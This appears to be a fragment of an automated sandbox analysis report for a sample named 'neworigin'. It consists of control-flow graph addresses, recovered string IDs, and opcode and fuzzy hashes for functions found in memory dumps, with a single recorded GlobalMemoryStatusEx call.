                                                                                                              • Opcode Fuzzy Hash: 2cfc2f02c47149ed8d6e335af7b0f94fc46a2f2b20c006773cc4140500b969ac
                                                                                                              • Instruction Fuzzy Hash: 55627D70A006098FDB14EF68D590A5EB7F2FF89300B60CA68D0469F359DB75EC86CB90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 885 6a94c88-6a94cac 886 6a94cae-6a94cb1 885->886 887 6a94cb3-6a94ccd 886->887 888 6a94cd2-6a94cd5 886->888 887->888 889 6a94cdb-6a94dd3 888->889 890 6a953b4-6a953b6 888->890 908 6a94dd9-6a94e26 call 6a95531 889->908 909 6a94e56-6a94e5d 889->909 892 6a953b8 890->892 893 6a953bd-6a953c0 890->893 892->893 893->886 895 6a953c6-6a953d3 893->895 922 6a94e2c-6a94e48 908->922 910 6a94ee1-6a94eea 909->910 911 6a94e63-6a94ed3 909->911 910->895 928 6a94ede 911->928 929 6a94ed5 911->929 926 6a94e4a 922->926 927 6a94e53-6a94e54 922->927 926->927 927->909 928->910 929->928
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$XPq$\Oq
                                                                                                              • API String ID: 0-132346853
                                                                                                              • Opcode ID: 60c904ba39c9d16967886a8a76970edf2fb8f3ff4082685c0275e1bcf7303628
                                                                                                              • Instruction ID: e7ae0558778dc715cc2e15654e7fe740db39281303021144dc9afe11d1a18ad1
                                                                                                              • Opcode Fuzzy Hash: 60c904ba39c9d16967886a8a76970edf2fb8f3ff4082685c0275e1bcf7303628
                                                                                                              • Instruction Fuzzy Hash: 87617371F002199FEF54EBA9C8547AEBBF2FF88300F20842AE105AB394DB755C458B90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1779 6a99241-6a99275 1780 6a99277-6a9927a 1779->1780 1781 6a99b38-6a99b3b 1780->1781 1782 6a99280-6a99295 1780->1782 1783 6a99b3d-6a99b5c 1781->1783 1784 6a99b61-6a99b63 1781->1784 1789 6a992ad-6a992c3 1782->1789 1790 6a99297-6a9929d 1782->1790 1783->1784 1786 6a99b6a-6a99b6d 1784->1786 1787 6a99b65 1784->1787 1786->1780 1791 6a99b73-6a99b7d 1786->1791 1787->1786 1796 6a992ce-6a992d0 1789->1796 1792 6a9929f 1790->1792 1793 6a992a1-6a992a3 1790->1793 1792->1789 1793->1789 1797 6a992e8-6a99359 1796->1797 1798 6a992d2-6a992d8 1796->1798 1809 6a9935b-6a9937e 1797->1809 1810 6a99385-6a993a1 1797->1810 1799 6a992da 1798->1799 1800 6a992dc-6a992de 1798->1800 1799->1797 1800->1797 1809->1810 1815 6a993cd-6a993e8 1810->1815 1816 6a993a3-6a993c6 1810->1816 1821 6a993ea-6a9940c 1815->1821 1822 6a99413-6a9942e 1815->1822 1816->1815 1821->1822 1827 6a99430-6a9944c 1822->1827 1828 6a99453-6a99461 1822->1828 1827->1828 1829 6a99471-6a994eb 1828->1829 1830 6a99463-6a9946c 1828->1830 1836 6a99538-6a9954d 1829->1836 1837 6a994ed-6a9950b 1829->1837 1830->1791 1836->1781 1841 6a9950d-6a9951c 1837->1841 1842 6a99527-6a99536 1837->1842 1841->1842 1842->1836 1842->1837
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: c6ccb0e7ff1d6bf500d4dd9b4c2be71121c3839bad50678f996db6a42e177a03
                                                                                                              • Instruction ID: 982d25c65497f1491ac5f34572c1c04fae39fb805001cb3cd27ad24601b397d4
                                                                                                              • Opcode Fuzzy Hash: c6ccb0e7ff1d6bf500d4dd9b4c2be71121c3839bad50678f996db6a42e177a03
                                                                                                              • Instruction Fuzzy Hash: BC515071B402089FDB55EB78D960BAF77F6BB89300F148569C909DB349EB709D01CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1845 6a94c78-6a94cac 1846 6a94cae-6a94cb1 1845->1846 1847 6a94cb3-6a94ccd 1846->1847 1848 6a94cd2-6a94cd5 1846->1848 1847->1848 1849 6a94cdb-6a94dd3 1848->1849 1850 6a953b4-6a953b6 1848->1850 1868 6a94dd9-6a94e26 call 6a95531 1849->1868 1869 6a94e56-6a94e5d 1849->1869 1852 6a953b8 1850->1852 1853 6a953bd-6a953c0 1850->1853 1852->1853 1853->1846 1855 6a953c6-6a953d3 1853->1855 1882 6a94e2c-6a94e48 1868->1882 1870 6a94ee1-6a94eea 1869->1870 1871 6a94e63-6a94ed3 1869->1871 1870->1855 1888 6a94ede 1871->1888 1889 6a94ed5 1871->1889 1886 6a94e4a 1882->1886 1887 6a94e53-6a94e54 1882->1887 1886->1887 1887->1869 1888->1870 1889->1888
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$XPq
                                                                                                              • API String ID: 0-3167736908
                                                                                                              • Opcode ID: 30437cd32c3e1ae105837892331c4b0d5ac9678516098056ce79a8af5881c99e
                                                                                                              • Instruction ID: 9c033a022dc2a84cda1116611fed209e861dcc96180a0c2e681367d99569391b
                                                                                                              • Opcode Fuzzy Hash: 30437cd32c3e1ae105837892331c4b0d5ac9678516098056ce79a8af5881c99e
                                                                                                              • Instruction Fuzzy Hash: CA517031F002199FEF54ABA9C8547AEBBF2FF88300F248529E105AF394DA759C458B90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1892 6a94cb0-6a94cb3 1893 6a94cbd-6a94ccd 1892->1893 1895 6a94cd2-6a94cd5 1893->1895 1896 6a94cdb-6a94dd3 1895->1896 1897 6a953b4-6a953b6 1895->1897 1915 6a94dd9-6a94e26 call 6a95531 1896->1915 1916 6a94e56-6a94e5d 1896->1916 1898 6a953b8 1897->1898 1899 6a953bd-6a953c0 1897->1899 1898->1899 1901 6a94cae-6a94cb1 1899->1901 1902 6a953c6-6a953d3 1899->1902 1901->1895 1903 6a94cb3 1901->1903 1903->1893 1929 6a94e2c-6a94e48 1915->1929 1917 6a94ee1-6a94eea 1916->1917 1918 6a94e63-6a94ed3 1916->1918 1917->1902 1935 6a94ede 1918->1935 1936 6a94ed5 1918->1936 1933 6a94e4a 1929->1933 1934 6a94e53-6a94e54 1929->1934 1933->1934 1934->1916 1935->1917 1936->1935
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$XPq
                                                                                                              • API String ID: 0-3167736908
                                                                                                              • Opcode ID: 2004d8c91cf15b4b7b0a3bbc7db26eecce8d66dc00562dd95d83ab87e465764f
                                                                                                              • Instruction ID: da24016f8d4d12defa5a5221776796c2ac55989bc8421c55980d695c5761e6fb
                                                                                                              • Opcode Fuzzy Hash: 2004d8c91cf15b4b7b0a3bbc7db26eecce8d66dc00562dd95d83ab87e465764f
                                                                                                              • Instruction Fuzzy Hash: 39412C71F002199FEF54EFA9C4547AEBAF2FF88700F24852AE105AF394DA749C458B90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1939 121ef08-121ef23 1940 121ef25-121ef4c 1939->1940 1941 121ef4d-121ef6c call 121e680 1939->1941 1946 121ef72-121efd1 1941->1946 1947 121ef6e-121ef71 1941->1947 1954 121efd3-121efd6 1946->1954 1955 121efd7-121f064 GlobalMemoryStatusEx 1946->1955 1958 121f066-121f06c 1955->1958 1959 121f06d-121f095 1955->1959 1958->1959
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1598356344.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_1210000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c2d202f64956d112a68d8058fae5e4ef665ca60c9c45f823a02ad9209d463b07
                                                                                                              • Instruction ID: 5c02ce41df8768061cf4437e17be5e04c39c20d5de6ca94e97ed3bdbf24ea355
                                                                                                              • Opcode Fuzzy Hash: c2d202f64956d112a68d8058fae5e4ef665ca60c9c45f823a02ad9209d463b07
                                                                                                              • Instruction Fuzzy Hash: 77416872E003968FDB15DF79D8003EEBBF1AF89310F15856AC954A7341D7349845CBA0
                                                                                                              APIs
                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0121F057
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1598356344.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_1210000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 1890195054-0
                                                                                                              • Opcode ID: 929ea2754188a07d6d459aa533d37c8851b665a374dfcc3d9c49fb5bd57885f7
                                                                                                              • Instruction ID: e2d6a0b411b91fc210aaa0bb3bd1b6bff0754955917703b9c8515feb747ed92c
                                                                                                              • Opcode Fuzzy Hash: 929ea2754188a07d6d459aa533d37c8851b665a374dfcc3d9c49fb5bd57885f7
                                                                                                              • Instruction Fuzzy Hash: EB1123B1C0025A9BDB10CF9AC544BDEFBF4AF48220F14812AD828A7240D378A944CFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PHq
                                                                                                              • API String ID: 0-3820536768
                                                                                                              • Opcode ID: 1edf80349e4abb64b10f0893f47d0af333603c506db49eead66318e48c4c29c7
                                                                                                              • Instruction ID: 732417426e9a398344149adc6a20d58588f9232c801a31e23d3830ea734ef9bc
                                                                                                              • Opcode Fuzzy Hash: 1edf80349e4abb64b10f0893f47d0af333603c506db49eead66318e48c4c29c7
                                                                                                              • Instruction Fuzzy Hash: FC41B274A007099FDF60EF75C4946AEBBF2BF86300F244529E441EB244DBB5A886CB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PHq
                                                                                                              • API String ID: 0-3820536768
                                                                                                              • Opcode ID: 93e6e4cefcf6f60d191fb895fd1f1ecfcfd1bdb66b8cbf5d7fe8139a5d9e6818
                                                                                                              • Instruction ID: b998875c0e52d3d0af3ee155040bf6de540825e297add2ff700df1a3016b6d9d
                                                                                                              • Opcode Fuzzy Hash: 93e6e4cefcf6f60d191fb895fd1f1ecfcfd1bdb66b8cbf5d7fe8139a5d9e6818
                                                                                                              • Instruction Fuzzy Hash: 6631D030B202059FDF59AB74D5647AE7BE2BB89600F604568E402DB384DF36CD05CBA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: 9c3e71ab12a766ff78297dcfdc99f49be3fc273c9394e0de6f31776465a53677
                                                                                                              • Instruction ID: 337ee0d7ae31d92cb10f2f9a8512e54e38a972da4e1b80b5e54fb66941d63a58
                                                                                                              • Opcode Fuzzy Hash: 9c3e71ab12a766ff78297dcfdc99f49be3fc273c9394e0de6f31776465a53677
                                                                                                              • Instruction Fuzzy Hash: C0F0DC36A002008FDF64AB58EA906A877E9EFC2210F244D66D905CF201D73DD941CFB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bfa93f5d1823fdb9dd9f247c0abd69d84af21604be7b09297000d535b768fa0e
                                                                                                              • Instruction ID: 539da86e4f94e0d1d8de86579697b30142ee1c3b658d30baa1f187c2f79cec02
                                                                                                              • Opcode Fuzzy Hash: bfa93f5d1823fdb9dd9f247c0abd69d84af21604be7b09297000d535b768fa0e
                                                                                                              • Instruction Fuzzy Hash: 0661A271F001214BDF54AB7EC89069FBAE7AF85610B294439D40AEB364DEB5ED028791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a722c0466f1ea9f1ee657ec2ac5ccd613b73a7b1fddfe34286d7d887eac9d05f
                                                                                                              • Instruction ID: 32bc39ccdde49fd4b27e6c9f3aad11d570ef7e234846e412f12312e6f1860ffc
                                                                                                              • Opcode Fuzzy Hash: a722c0466f1ea9f1ee657ec2ac5ccd613b73a7b1fddfe34286d7d887eac9d05f
                                                                                                              • Instruction Fuzzy Hash: 70813B71B006098FDF54EFA8D4A079EBBF2EB89300F208529D50AEB355DB35DC428B51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac0f490302e8b178d2aceff77d428b61bbeb7f50c3e72da9bf49712ad8fc5ae2
                                                                                                              • Instruction ID: 4ef5adf477a72bcb825645292b1891e54c626b44bbbb4b3ad2747776a5b20419
                                                                                                              • Opcode Fuzzy Hash: ac0f490302e8b178d2aceff77d428b61bbeb7f50c3e72da9bf49712ad8fc5ae2
                                                                                                              • Instruction Fuzzy Hash: 59913030E106198FDF60DF68C89079DB7B1FF8A300F208695D549AB255DB70AA86CF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ebd37398d7a44b315a8f8fca336ee110a797071fe78f119b7b522128b6e3b986
                                                                                                              • Instruction ID: 4c269adf1192eee393f7984b30078c3ad0499fd091db2d27ed5fb736746ada35
                                                                                                              • Opcode Fuzzy Hash: ebd37398d7a44b315a8f8fca336ee110a797071fe78f119b7b522128b6e3b986
                                                                                                              • Instruction Fuzzy Hash: B0912D30E106198BDF64DF68C890B9DB7B1FF89310F208699D549BB354DB71AA86CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d71fae7fe6da40ceb760f63291583c30011fa32d1997ff2d5b36fd7fe620586a
                                                                                                              • Instruction ID: 976c84327c563094136e867478d82320b443ced45c28facc33b189f04d83f448
                                                                                                              • Opcode Fuzzy Hash: d71fae7fe6da40ceb760f63291583c30011fa32d1997ff2d5b36fd7fe620586a
                                                                                                              • Instruction Fuzzy Hash: 7B715C30A002099FDF54EFA9D990AADBBF6FF89300F258529D055AB355DB34EC46CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc5b1a0618a03fbc56e4472847e710759725c9ceaa24f3235b35b5d1a25812b8
                                                                                                              • Instruction ID: 13df41bf4e87919aa669fb29ae1ca12702b8b8e9bce3680ccca5e4e665528134
                                                                                                              • Opcode Fuzzy Hash: dc5b1a0618a03fbc56e4472847e710759725c9ceaa24f3235b35b5d1a25812b8
                                                                                                              • Instruction Fuzzy Hash: B2714C30A002099FDB54EFA9C990A9EBBF6FF89300F248529D045EB355DB30EC46CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3021e782508ba5db3b3f835b3324a077fb696c4c48a6925e1b4dcd649dac60d3
                                                                                                              • Instruction ID: 38bf8a0fd808752a67dc37a1df33a8d836d835b77a68d92a3feea49d578210ce
                                                                                                              • Opcode Fuzzy Hash: 3021e782508ba5db3b3f835b3324a077fb696c4c48a6925e1b4dcd649dac60d3
                                                                                                              • Instruction Fuzzy Hash: DE51A374B102049FFF647FA8D86476F36ABE78A710F30442AE44ADB795CA79CC4147A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0713cac7217cb8775a934dfbf7291b1b4dc2525ed463649ea0e79e11210b9e3
                                                                                                              • Instruction ID: c7d955b21d6bf141392ab6949246134b28d5a87a9279b9ae424a089d4d5b73fc
                                                                                                              • Opcode Fuzzy Hash: c0713cac7217cb8775a934dfbf7291b1b4dc2525ed463649ea0e79e11210b9e3
                                                                                                              • Instruction Fuzzy Hash: 2451A574B102049FFF647FA8D86472F36DAE78A750F30442AE50ACB795CA78CC4147A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8289b317554bda1fc560333c831af3749c25366255e8eb5e4ba824abcc0cd1b
                                                                                                              • Instruction ID: fa06999f05adeb28f7a2af36f9edb540d155695ba28af730bf9e5f4456e33e41
                                                                                                              • Opcode Fuzzy Hash: b8289b317554bda1fc560333c831af3749c25366255e8eb5e4ba824abcc0cd1b
                                                                                                              • Instruction Fuzzy Hash: 51417F71E006098FDF61DF99D881AAFF7F6EB44310F24492AE216D7251D230E855CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a66d7a8c6676ddb5b4ea40f6a94bf5c59dde2d9072b557c0c4591e0827fc178e
                                                                                                              • Instruction ID: 5076862e5aa32aaff6a71b34e89a8be95d55497eb43891c9dc01268c68311942
                                                                                                              • Opcode Fuzzy Hash: a66d7a8c6676ddb5b4ea40f6a94bf5c59dde2d9072b557c0c4591e0827fc178e
                                                                                                              • Instruction Fuzzy Hash: 29318030E102059BDF55EF64D89479EB7F2EF89300F208519E906EB354DB71AE46CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2778bd8a22ae8b439368d500ebc6c4e00c64097c9aeab1fde2883e933646f256
                                                                                                              • Instruction ID: 7b39e980b49607509cc85a3a3e70655be3f807542698277167865bc815a50633
                                                                                                              • Opcode Fuzzy Hash: 2778bd8a22ae8b439368d500ebc6c4e00c64097c9aeab1fde2883e933646f256
                                                                                                              • Instruction Fuzzy Hash: 19315030E102059BDF55EFA4D89479EB7F6BF89300F208529E906EB354DB71AD46CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edee3b899732751aa7c807db098ede4d2ec64af2c640000764a8b25cb14e705e
                                                                                                              • Instruction ID: 467f41b5bee2a9ce859744625ec09b083265206c6683b98200937dcce8866681
                                                                                                              • Opcode Fuzzy Hash: edee3b899732751aa7c807db098ede4d2ec64af2c640000764a8b25cb14e705e
                                                                                                              • Instruction Fuzzy Hash: EC217C75E01A189FDF50DF68D980AEEBBF5BB48310F204029E905EB354EB31D945CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 929f62d5c06bfcd9363d3955fa2e647a31520ac3afe41b5b20ed3b314a8c653d
                                                                                                              • Instruction ID: b5a426c357a01a77ad497a00e8166bbe8d6acb2c4132a8d3bb08b523a364bbaa
                                                                                                              • Opcode Fuzzy Hash: 929f62d5c06bfcd9363d3955fa2e647a31520ac3afe41b5b20ed3b314a8c653d
                                                                                                              • Instruction Fuzzy Hash: 6C214F75E00A199FDF50DF69D990AAEBBF5BB48310F104029E905EB354EB31D940CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82a3d93f6b6418abd29aded6408f560d6f468dff4d80f67c05be78fc0b164dfd
                                                                                                              • Instruction ID: f52e0fc45c236698d07e8ee75a6ae38c10ce4d3e634271a23311fa731e1fbdc6
                                                                                                              • Opcode Fuzzy Hash: 82a3d93f6b6418abd29aded6408f560d6f468dff4d80f67c05be78fc0b164dfd
                                                                                                              • Instruction Fuzzy Hash: 74118E32B006289FDF94A66DC8646AE77F6EBC8311B104539D806EB348DE65DC068BE0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d723b4768c599b40ce7a9ba7cf2d634b562ff0add2e51b53b777effb85d2c616
                                                                                                              • Instruction ID: 7c1e05cb09064e7f3fec2e9cd532abf37aadf32f4f7cbf31643f9c9aeabf13a4
                                                                                                              • Opcode Fuzzy Hash: d723b4768c599b40ce7a9ba7cf2d634b562ff0add2e51b53b777effb85d2c616
                                                                                                              • Instruction Fuzzy Hash: 03019A31B201101BEB65AB7CA854B2FB7EADBCA310F24892EE50ACB355D965DC0343A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2caee75c8e5a16b81ff6f709d2a421e4f8fb143a5d8ced95567fb6e7386c2aeb
                                                                                                              • Instruction ID: b0745d7beb3b4c7ba1cea44e4e6627d799647afb415c1e4763c7f9536757d80e
                                                                                                              • Opcode Fuzzy Hash: 2caee75c8e5a16b81ff6f709d2a421e4f8fb143a5d8ced95567fb6e7386c2aeb
                                                                                                              • Instruction Fuzzy Hash: E12103B5D01259AFCB10DF9AD884BCEFBF8FB48310F10812AE918A7200C375A554CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cfd6052633ac054e4fe0a42d95fd108e81372120540e7d3a703d07a0494e768
                                                                                                              • Instruction ID: f69dab2ed007480deb2f0dc7342febfd5b27a9da16b54148c125446465caa4a1
                                                                                                              • Opcode Fuzzy Hash: 0cfd6052633ac054e4fe0a42d95fd108e81372120540e7d3a703d07a0494e768
                                                                                                              • Instruction Fuzzy Hash: 0201B135B000104BDF65EBACA450B6E67E6EF8A714F24893AE10ACB342DA25CC0243A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77398c62171c39bbec3412224c1262f1fd74d5b1a3290cfe37523d6789b2a8c1
                                                                                                              • Instruction ID: 27b5d0beeb427cf1d86fc00698d5ac6c95db43316a1e8c5f1143a511f45efc23
                                                                                                              • Opcode Fuzzy Hash: 77398c62171c39bbec3412224c1262f1fd74d5b1a3290cfe37523d6789b2a8c1
